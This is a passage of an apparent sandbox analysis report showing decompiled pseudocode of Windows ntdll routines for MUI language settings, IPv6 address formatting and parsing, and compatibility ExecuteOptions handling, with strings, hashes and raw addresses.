                                                    							if(_v8 != _t318) {
                                                    								E021FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                    							}
                                                    							if(_v28 != _t318) {
                                                    								if(_v20 != _t318) {
                                                    									E021FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                    									_v20 = _t318;
                                                    									_v40 = _t318;
                                                    								}
                                                    							}
                                                    							goto L49;
                                                    						}
                                                    						_t231 = _v24;
                                                    						_t322 = _t231 + 4;
                                                    						_push(_t231);
                                                    						_v52 = _t322;
                                                    						E0221718A(_t231);
                                                    						if(_t322 == _t318) {
                                                    							_v32 = _t318;
                                                    						} else {
                                                    							_v32 = E021FE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                    						}
                                                    						if(_v32 == _t318) {
                                                    							_v52 = _t318;
                                                    							L58:
                                                    							_t329 = 0xc0000017;
                                                    							goto L47;
                                                    						} else {
                                                    							E021F2340(_v32, _v8, _v24);
                                                    							_v16 = _v32;
                                                    							_a4 = _t318;
                                                    							_t235 = E0220E679(_v32, _t332);
                                                    							while(1) {
                                                    								_t319 = _t235;
                                                    								if(_t319 == 0) {
                                                    									break;
                                                    								}
                                                    								 *_t319 = 0;
                                                    								_t321 = _t319 + 2;
                                                    								E021FE2A8(_t322,  &_v68, _v16);
                                                    								if(E02215553(_t328,  &_v68,  &_v36) != 0) {
                                                    									_a4 = _a4 + 1;
                                                    								}
                                                    								_v16 = _t321;
                                                    								_t235 = E0220E679(_t321, _t332);
                                                    								_pop(_t322);
                                                    							}
                                                    							_t236 = _v16;
                                                    							if( *_v16 != _t319) {
                                                    								E021FE2A8(_t322,  &_v68, _t236);
                                                    								if(E02215553(_t328,  &_v68,  &_v36) != 0) {
                                                    									_a4 = _a4 + 1;
                                                    								}
                                                    							}
                                                    							if(_a4 == 0) {
                                                    								E021FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                    								_v52 = _v52 & 0x00000000;
                                                    								_v32 = _v32 & 0x00000000;
                                                    							}
                                                    							if(_v8 != 0) {
                                                    								E021FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                    							}
                                                    							_v8 = _v8 & 0x00000000;
                                                    							_t318 = 0;
                                                    							goto L46;
                                                    						}
                                                    					}
                                                    					_t257 = _v24;
                                                    					_t322 = _t257 + 4;
                                                    					_push(_t257);
                                                    					_v40 = _t322;
                                                    					E0221718A(_t257);
                                                    					_t338 = _t335 + 4;
                                                    					if(_t322 == _t318) {
                                                    						_v20 = _t318;
                                                    					} else {
                                                    						_v20 = E021FE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                    					}
                                                    					if(_v20 == _t318) {
                                                    						_v40 = _t318;
                                                    						goto L58;
                                                    					} else {
                                                    						E021F2340(_v20, _v8, _v24);
                                                    						_v16 = _v20;
                                                    						_a4 = _t318;
                                                    						_t261 = E0220E679(_v20, _t332);
                                                    						_t335 = _t338 + 0x14;
                                                    						while(1) {
                                                    							_v12 = _t261;
                                                    							if(_t261 == _t318) {
                                                    								break;
                                                    							}
                                                    							_v12 = _v12 + 2;
                                                    							 *_v12 = 0;
                                                    							E021FE2A8(_v12,  &_v68, _v16);
                                                    							if(E02215553(_t328,  &_v68,  &_v36) != 0) {
                                                    								_a4 = _a4 + 1;
                                                    							}
                                                    							_v16 = _v12;
                                                    							_t261 = E0220E679(_v12, _t332);
                                                    							_pop(_t322);
                                                    						}
                                                    						_t269 = _v16;
                                                    						if( *_v16 != _t318) {
                                                    							E021FE2A8(_t322,  &_v68, _t269);
                                                    							if(E02215553(_t328,  &_v68,  &_v36) != 0) {
                                                    								_a4 = _a4 + 1;
                                                    							}
                                                    						}
                                                    						if(_a4 == _t318) {
                                                    							E021FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                    							_v40 = _t318;
                                                    							_v20 = _t318;
                                                    						}
                                                    						if(_v8 != _t318) {
                                                    							E021FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                    						}
                                                    						_v8 = _t318;
                                                    						goto L30;
                                                    					}
                                                    				}
                                                    				_t284 = _v24;
                                                    				_t322 = _t284 + 4;
                                                    				_push(_t284);
                                                    				_v48 = _t322;
                                                    				E0221718A(_t284);
                                                    				_t339 = _t335 + 4;
                                                    				if(_t322 == _t318) {
                                                    					_v28 = _t318;
                                                    				} else {
                                                    					_v28 = E021FE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                    				}
                                                    				if(_v28 == _t318) {
                                                    					_v48 = _t318;
                                                    					goto L58;
                                                    				} else {
                                                    					E021F2340(_v28, _v8, _v24);
                                                    					_v16 = _v28;
                                                    					_a4 = _t318;
                                                    					_t288 = E0220E679(_v28, _t332);
                                                    					_t335 = _t339 + 0x14;
                                                    					while(1) {
                                                    						_v12 = _t288;
                                                    						if(_t288 == _t318) {
                                                    							break;
                                                    						}
                                                    						_v12 = _v12 + 2;
                                                    						 *_v12 = 0;
                                                    						E021FE2A8(_v12,  &_v68, _v16);
                                                    						if(E02215553(_t328,  &_v68,  &_v36) != 0) {
                                                    							_a4 = _a4 + 1;
                                                    						}
                                                    						_v16 = _v12;
                                                    						_t288 = E0220E679(_v12, _t332);
                                                    						_pop(_t322);
                                                    					}
                                                    					_t296 = _v16;
                                                    					if( *_v16 != _t318) {
                                                    						E021FE2A8(_t322,  &_v68, _t296);
                                                    						if(E02215553(_t328,  &_v68,  &_v36) != 0) {
                                                    							_a4 = _a4 + 1;
                                                    						}
                                                    					}
                                                    					if(_a4 == _t318) {
                                                    						E021FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                    						_v48 = _t318;
                                                    						_v28 = _t318;
                                                    					}
                                                    					if(_v8 != _t318) {
                                                    						E021FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                    					}
                                                    					_v8 = _t318;
                                                    					goto L17;
                                                    				}
                                                    			}


                                                    APIs
                                                    Strings
                                                    • WindowsExcludedProcs, xrefs: 022187C1
                                                    • Kernel-MUI-Language-Allowed, xrefs: 02218827
                                                    • Kernel-MUI-Number-Allowed, xrefs: 022187E6
                                                    • Kernel-MUI-Language-SKU, xrefs: 022189FC
                                                    • Kernel-MUI-Language-Disallowed, xrefs: 02218914
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
• Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp
• Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp
• Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: _wcspbrk
                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                    • API String ID: 402402107-258546922
                                                    • Opcode ID: 391982db7b7b7cffe0ad27ef64ddd41e08541b03c8decb687979828bbae5aa37
                                                    • Instruction ID: 081e2711cba9e3fd3ebc08b77671ba76b006db1fbd8195768709f8776e35835e
                                                    • Opcode Fuzzy Hash: 391982db7b7b7cffe0ad27ef64ddd41e08541b03c8decb687979828bbae5aa37
                                                    • Instruction Fuzzy Hash: 14F103B2D1020AEFDB51DFD8C984DEEB7F9BB18304F10446AE605A7224E734AA51DF61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 38%
                                                    			E022313CB(intOrPtr* _a4, intOrPtr _a8) {
                                                    				char _v8;
                                                    				intOrPtr _v12;
                                                    				intOrPtr* _v16;
                                                    				intOrPtr _v20;
                                                    				char _v24;
                                                    				intOrPtr _t71;
                                                    				signed int _t78;
                                                    				signed int _t86;
                                                    				char _t90;
                                                    				signed int _t91;
                                                    				signed int _t96;
                                                    				intOrPtr _t108;
                                                    				signed int _t114;
                                                    				void* _t115;
                                                    				intOrPtr _t128;
                                                    				intOrPtr* _t129;
                                                    				void* _t130;
                                                    
                                                    				_t129 = _a4;
                                                    				_t128 = _a8;
                                                    				_t116 = 0;
                                                    				_t71 = _t128 + 0x5c;
                                                    				_v8 = 8;
                                                    				_v20 = _t71;
                                                    				if( *_t129 == 0) {
                                                    					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                    						goto L5;
                                                    					} else {
                                                    						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                    						if(_t96 != 0) {
                                                    							L38:
                                                    							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                    								goto L5;
                                                    							} else {
                                                    								_push( *(_t129 + 0xf) & 0x000000ff);
                                                    								_push( *(_t129 + 0xe) & 0x000000ff);
                                                    								_push( *(_t129 + 0xd) & 0x000000ff);
                                                    								_t86 = E02227707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                    								L36:
                                                    								return _t128 + _t86 * 2;
                                                    							}
                                                    						}
                                                    						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                    						if(_t114 == 0) {
                                                    							L33:
                                                    							_t115 = 0x21f2926;
                                                    							L35:
                                                    							_push( *(_t129 + 0xf) & 0x000000ff);
                                                    							_push( *(_t129 + 0xe) & 0x000000ff);
                                                    							_push( *(_t129 + 0xd) & 0x000000ff);
                                                    							_push( *(_t129 + 0xc) & 0x000000ff);
                                                    							_t86 = E02227707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                    							goto L36;
                                                    						}
                                                    						if(_t114 != 0xffff) {
                                                    							_t116 = 0;
                                                    							goto L38;
                                                    						}
                                                    						if(_t114 != 0) {
                                                    							_t115 = 0x21f9cac;
                                                    							goto L35;
                                                    						}
                                                    						goto L33;
                                                    					}
                                                    				} else {
                                                    					L5:
                                                    					_a8 = _t116;
                                                    					_a4 = _t116;
                                                    					_v12 = _t116;
                                                    					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                    						if( *(_t129 + 0xa) == 0xfe5e) {
                                                    							_v8 = 6;
                                                    						}
                                                    					}
                                                    					_t90 = _v8;
                                                    					if(_t90 <= _t116) {
                                                    						L11:
                                                    						if(_a8 - _a4 <= 1) {
                                                    							_a8 = _t116;
                                                    							_a4 = _t116;
                                                    						}
                                                    						_t91 = 0;
                                                    						if(_v8 <= _t116) {
                                                    							L22:
                                                    							if(_v8 < 8) {
                                                    								_push( *(_t129 + 0xf) & 0x000000ff);
                                                    								_push( *(_t129 + 0xe) & 0x000000ff);
                                                    								_push( *(_t129 + 0xd) & 0x000000ff);
                                                    								_t128 = _t128 + E02227707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                    							}
                                                    							return _t128;
                                                    						} else {
                                                    							L14:
                                                    							if(_a4 > _t91 || _t91 >= _a8) {
                                                    								if(_t91 != _t116 && _t91 != _a8) {
                                                    									_push(":");
                                                    									_push(_t71 - _t128 >> 1);
                                                    									_push(_t128);
                                                    									_t128 = _t128 + E02227707() * 2;
                                                    									_t71 = _v20;
                                                    									_t130 = _t130 + 0xc;
                                                    								}
                                                    								_t78 = E02227707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                    								_t130 = _t130 + 0x10;
                                                    							} else {
                                                    								_push(L"::");
                                                    								_push(_t71 - _t128 >> 1);
                                                    								_push(_t128);
                                                    								_t78 = E02227707();
                                                    								_t130 = _t130 + 0xc;
                                                    								_t91 = _a8 - 1;
                                                    							}
                                                    							_t91 = _t91 + 1;
                                                    							_t128 = _t128 + _t78 * 2;
                                                    							_t71 = _v20;
                                                    							if(_t91 >= _v8) {
                                                    								goto L22;
                                                    							}
                                                    							_t116 = 0;
                                                    							goto L14;
                                                    						}
                                                    					} else {
                                                    						_t108 = 1;
                                                    						_v16 = _t129;
                                                    						_v24 = _t90;
                                                    						do {
                                                    							if( *_v16 == _t116) {
                                                    								if(_t108 - _v12 > _a8 - _a4) {
                                                    									_a4 = _v12;
                                                    									_a8 = _t108;
                                                    								}
                                                    								_t116 = 0;
                                                    							} else {
                                                    								_v12 = _t108;
                                                    							}
                                                    							_v16 = _v16 + 2;
                                                    							_t108 = _t108 + 1;
                                                    							_t26 =  &_v24;
                                                    							 *_t26 = _v24 - 1;
                                                    						} while ( *_t26 != 0);
                                                    						goto L11;
                                                    					}
                                                    				}
                                                    			}

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: e5fe611ad36e1bd9c37e4cb1bcf0a59273f8d24245f7c79ac98ef5e3bc4ab2d5
                                                    • Instruction ID: 631dd630a75fab7537ac6a9a10135f52846147483b819f0065db32a4f8a182a5
                                                    • Opcode Fuzzy Hash: e5fe611ad36e1bd9c37e4cb1bcf0a59273f8d24245f7c79ac98ef5e3bc4ab2d5
                                                    • Instruction Fuzzy Hash: 546158B1D24756AACF35DFD9C8809BEBBB5EF84310714C02DEAEA47548D371A650CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 64%
                                                    			E02227EFD(void* __ecx, intOrPtr _a4) {
                                                    				signed int _v8;
                                                    				char _v540;
                                                    				unsigned int _v544;
                                                    				signed int _v548;
                                                    				intOrPtr _v552;
                                                    				char _v556;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed int _t33;
                                                    				void* _t38;
                                                    				unsigned int _t46;
                                                    				unsigned int _t47;
                                                    				unsigned int _t52;
                                                    				intOrPtr _t56;
                                                    				unsigned int _t62;
                                                    				void* _t69;
                                                    				void* _t70;
                                                    				intOrPtr _t72;
                                                    				signed int _t73;
                                                    				void* _t74;
                                                    				void* _t75;
                                                    				void* _t76;
                                                    				void* _t77;
                                                    
                                                    				_t33 =  *0x22d2088; // 0x7634c1a7
                                                    				_v8 = _t33 ^ _t73;
                                                    				_v548 = _v548 & 0x00000000;
                                                    				_t72 = _a4;
                                                    				if(E02227F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                    					__eflags = _v548;
                                                    					if(_v548 == 0) {
                                                    						goto L1;
                                                    					}
                                                    					_t62 = _t72 + 0x24;
                                                    					E02243F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                    					_t71 = 0x214;
                                                    					_v544 = 0x214;
                                                    					E021FDFC0( &_v540, 0, 0x214);
                                                    					_t75 = _t74 + 0x20;
                                                    					_t46 =  *0x22d4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                    					__eflags = _t46;
                                                    					if(_t46 == 0) {
                                                    						goto L1;
                                                    					}
                                                    					_t47 = _v544;
                                                    					__eflags = _t47;
                                                    					if(_t47 == 0) {
                                                    						goto L1;
                                                    					}
                                                    					__eflags = _t47 - 0x214;
                                                    					if(_t47 >= 0x214) {
                                                    						goto L1;
                                                    					}
                                                    					_push(_t62);
                                                    					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                    					E02243F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                    					_t52 = E02200D27( &_v540, L"Execute=1");
                                                    					_t76 = _t75 + 0x1c;
                                                    					_push(_t62);
                                                    					__eflags = _t52;
                                                    					if(_t52 == 0) {
                                                    						E02243F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                    						_t71 =  &_v540;
                                                    						_t56 = _t73 + _v544 - 0x218;
                                                    						_t77 = _t76 + 0x14;
                                                    						_v552 = _t56;
                                                    						__eflags = _t71 - _t56;
                                                    						if(_t71 >= _t56) {
                                                    							goto L1;
                                                    						} else {
                                                    							goto L10;
                                                    						}
                                                    						while(1) {
                                                    							L10:
                                                    							_t62 = E02208375(_t71, 0x20);
                                                    							_pop(_t69);
                                                    							__eflags = _t62;
                                                    							if(__eflags != 0) {
                                                    								__eflags = 0;
                                                    								 *_t62 = 0;
                                                    							}
                                                    							E02243F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                    							_t77 = _t77 + 0x10;
                                                    							E0226E8DB(_t69, _t70, __eflags, _t72, _t71);
                                                    							__eflags = _t62;
                                                    							if(_t62 == 0) {
                                                    								goto L1;
                                                    							}
                                                    							_t31 = _t62 + 2; // 0x2
                                                    							_t71 = _t31;
                                                    							__eflags = _t71 - _v552;
                                                    							if(_t71 >= _v552) {
                                                    								goto L1;
                                                    							}
                                                    						}
                                                    					}
                                                    					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                    					_push(3);
                                                    					_push(0x55);
                                                    					E02243F92();
                                                    					_t38 = 1;
                                                    					L2:
                                                    					return E021FE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                    				}
                                                    				L1:
                                                    				_t38 = 0;
                                                    				goto L2;
                                                    			}

                                                    APIs
                                                    • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02243F12
                                                    Strings
                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02243F4A
                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 0224E345
                                                    • Execute=1, xrefs: 02243F5E
                                                    • ExecuteOptions, xrefs: 02243F04
                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0224E2FB
                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02243F75
                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02243EC4
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: BaseDataModuleQuery
                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                    • API String ID: 3901378454-484625025
                                                    • Opcode ID: d718099888a1d31df86d87b3d32231f0378f270bd60c53856a165c6c40904f27
                                                    • Instruction ID: b1f03886d129f77af69f5530b3573bf95e5dc52879242d03fd2c5bbac30f6d1a
                                                    • Opcode Fuzzy Hash: d718099888a1d31df86d87b3d32231f0378f270bd60c53856a165c6c40904f27
                                                    • Instruction Fuzzy Hash: 9641EB3169431D7AEF20DAD4DCC9FEAB3BDAF14704F0005A9E605E6085EF719A458F61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E02230B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                    				signed int _v8;
                                                    				signed int _v12;
                                                    				signed int _v16;
                                                    				signed int _v20;
                                                    				signed int _v24;
                                                    				signed int _v28;
                                                    				signed int _v32;
                                                    				void* _t108;
                                                    				void* _t116;
                                                    				char _t120;
                                                    				short _t121;
                                                    				void* _t128;
                                                    				intOrPtr* _t130;
                                                    				char _t132;
                                                    				short _t133;
                                                    				intOrPtr _t141;
                                                    				signed int _t156;
                                                    				signed int _t174;
                                                    				intOrPtr _t177;
                                                    				intOrPtr* _t179;
                                                    				intOrPtr _t180;
                                                    				void* _t183;
                                                    
                                                    				_t179 = _a4;
                                                    				_t141 =  *_t179;
                                                    				_v16 = 0;
                                                    				_v28 = 0;
                                                    				_v8 = 0;
                                                    				_v24 = 0;
                                                    				_v12 = 0;
                                                    				_v32 = 0;
                                                    				_v20 = 0;
                                                    				if(_t141 == 0) {
                                                    					L41:
                                                    					 *_a8 = _t179;
                                                    					_t180 = _v24;
                                                    					if(_t180 != 0) {
                                                    						if(_t180 != 3) {
                                                    							goto L6;
                                                    						}
                                                    						_v8 = _v8 + 1;
                                                    					}
                                                    					_t174 = _v32;
                                                    					if(_t174 == 0) {
                                                    						if(_v8 == 7) {
                                                    							goto L43;
                                                    						}
                                                    						goto L6;
                                                    					}
                                                    					L43:
                                                    					if(_v16 != 1) {
                                                    						if(_v16 != 2) {
                                                    							goto L6;
                                                    						}
                                                    						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                    						L47:
                                                    						if(_t174 != 0) {
                                                    							E02208980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                    							_t116 = 8;
                                                    							E021FDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                    						}
                                                    						return 0;
                                                    					}
                                                    					if(_t180 != 0) {
                                                    						if(_v12 > 3) {
                                                    							goto L6;
                                                    						}
                                                    						_t120 = E02230CFA(_v28, 0, 0xa);
                                                    						_t183 = _t183 + 0xc;
                                                    						if(_t120 > 0xff) {
                                                    							goto L6;
                                                    						}
                                                    						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                    						goto L47;
                                                    					}
                                                    					if(_v12 > 4) {
                                                    						goto L6;
                                                    					}
                                                    					_t121 = E02230CFA(_v28, _t180, 0x10);
                                                    					_t183 = _t183 + 0xc;
                                                    					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                    					goto L47;
                                                    				} else {
                                                    					while(1) {
                                                    						_t123 = _v16;
                                                    						if(_t123 == 0) {
                                                    							goto L7;
                                                    						}
                                                    						_t108 = _t123 - 1;
                                                    						if(_t108 != 0) {
                                                    							goto L1;
                                                    						}
                                                    						_t178 = _t141;
                                                    						if(E022306BA(_t108, _t141) == 0 || _t135 == 0) {
                                                    							if(E022306BA(_t135, _t178) == 0 || E02230A5B(_t136, _t178) == 0) {
                                                    								if(_t141 != 0x3a) {
                                                    									if(_t141 == 0x2e) {
                                                    										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                    											goto L41;
                                                    										} else {
                                                    											_v24 = _v24 + 1;
                                                    											L27:
                                                    											_v16 = _v16 & 0x00000000;
                                                    											L28:
                                                    											if(_v28 == 0) {
                                                    												goto L20;
                                                    											}
                                                    											_t177 = _v24;
                                                    											if(_t177 != 0) {
                                                    												if(_v12 > 3) {
                                                    													L6:
                                                    													return 0xc000000d;
                                                    												}
                                                    												_t132 = E02230CFA(_v28, 0, 0xa);
                                                    												_t183 = _t183 + 0xc;
                                                    												if(_t132 > 0xff) {
                                                    													goto L6;
                                                    												}
                                                    												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                    												goto L20;
                                                    											}
                                                    											if(_v12 > 4) {
                                                    												goto L6;
                                                    											}
                                                    											_t133 = E02230CFA(_v28, 0, 0x10);
                                                    											_t183 = _t183 + 0xc;
                                                    											_v20 = _v20 + 1;
                                                    											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                    											goto L20;
                                                    										}
                                                    									}
                                                    									goto L41;
                                                    								}
                                                    								if(_v24 > 0 || _v8 > 6) {
                                                    									goto L41;
                                                    								} else {
                                                    									_t130 = _t179 + 1;
                                                    									if( *_t130 == _t141) {
                                                    										if(_v32 != 0) {
                                                    											goto L41;
                                                    										}
                                                    										_v32 = _v8 + 1;
                                                    										_t156 = 2;
                                                    										_v8 = _v8 + _t156;
                                                    										L34:
                                                    										_t179 = _t130;
                                                    										_v16 = _t156;
                                                    										goto L28;
                                                    									}
                                                    									_v8 = _v8 + 1;
                                                    									goto L27;
                                                    								}
                                                    							} else {
                                                    								_v12 = _v12 + 1;
                                                    								if(_v24 > 0) {
                                                    									goto L41;
                                                    								}
                                                    								_a7 = 1;
                                                    								goto L20;
                                                    							}
                                                    						} else {
                                                    							_v12 = _v12 + 1;
                                                    							L20:
                                                    							_t179 = _t179 + 1;
                                                    							_t141 =  *_t179;
                                                    							if(_t141 == 0) {
                                                    								goto L41;
                                                    							}
                                                    							continue;
                                                    						}
                                                    						L7:
                                                    						if(_t141 == 0x3a) {
                                                    							if(_v24 > 0 || _v8 > 0) {
                                                    								goto L41;
                                                    							} else {
                                                    								_t130 = _t179 + 1;
                                                    								if( *_t130 != _t141) {
                                                    									goto L41;
                                                    								}
                                                    								_v20 = _v20 + 1;
                                                    								_t156 = 2;
                                                    								_v32 = 1;
                                                    								_v8 = _t156;
                                                    								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                    								goto L34;
                                                    							}
                                                    						}
                                                    						L8:
                                                    						if(_v8 > 7) {
                                                    							goto L41;
                                                    						}
                                                    						_t142 = _t141;
                                                    						if(E022306BA(_t123, _t141) == 0 || _t124 == 0) {
                                                    							if(E022306BA(_t124, _t142) == 0 || E02230A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                    								goto L41;
                                                    							} else {
                                                    								_t128 = 1;
                                                    								_a7 = 1;
                                                    								_v28 = _t179;
                                                    								_v16 = 1;
                                                    								_v12 = 1;
                                                    								L39:
                                                    								if(_v16 == _t128) {
                                                    									goto L20;
                                                    								}
                                                    								goto L28;
                                                    							}
                                                    						} else {
                                                    							_a7 = 0;
                                                    							_v28 = _t179;
                                                    							_v16 = 1;
                                                    							_v12 = 1;
                                                    							goto L20;
                                                    						}
                                                    					}
                                                    				}
                                                    				L1:
                                                    				_t123 = _t108 == 1;
                                                    				if(_t108 == 1) {
                                                    					goto L8;
                                                    				}
                                                    				_t128 = 1;
                                                    				goto L39;
                                                    			}
                                                    0x02230bcd
                                                    0x02230b89
                                                    0x02230b89
                                                    0x02230b90
                                                    0x00000000
                                                    0x00000000
                                                    0x02230b96
                                                    0x00000000
                                                    0x02230b96
                                                    0x02230a04
                                                    0x02230a04
                                                    0x02230b9a
                                                    0x02230b9a
                                                    0x02230b9b
                                                    0x02230b9f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x02230ba5
                                                    0x02230ac7
                                                    0x02230aca
                                                    0x0225eacf
                                                    0x00000000
                                                    0x0225eade
                                                    0x0225eade
                                                    0x0225eae3
                                                    0x00000000
                                                    0x00000000
                                                    0x0225eaf3
                                                    0x0225eaf6
                                                    0x0225eaf7
                                                    0x0225eafe
                                                    0x0225eb01
                                                    0x00000000
                                                    0x0225eb01
                                                    0x0225eacf
                                                    0x02230ad0
                                                    0x02230ad4
                                                    0x00000000
                                                    0x00000000
                                                    0x02230ada
                                                    0x02230ae6
                                                    0x02230c34
                                                    0x00000000
                                                    0x02230c47
                                                    0x02230c49
                                                    0x02230c4a
                                                    0x02230c4e
                                                    0x02230c51
                                                    0x02230c54
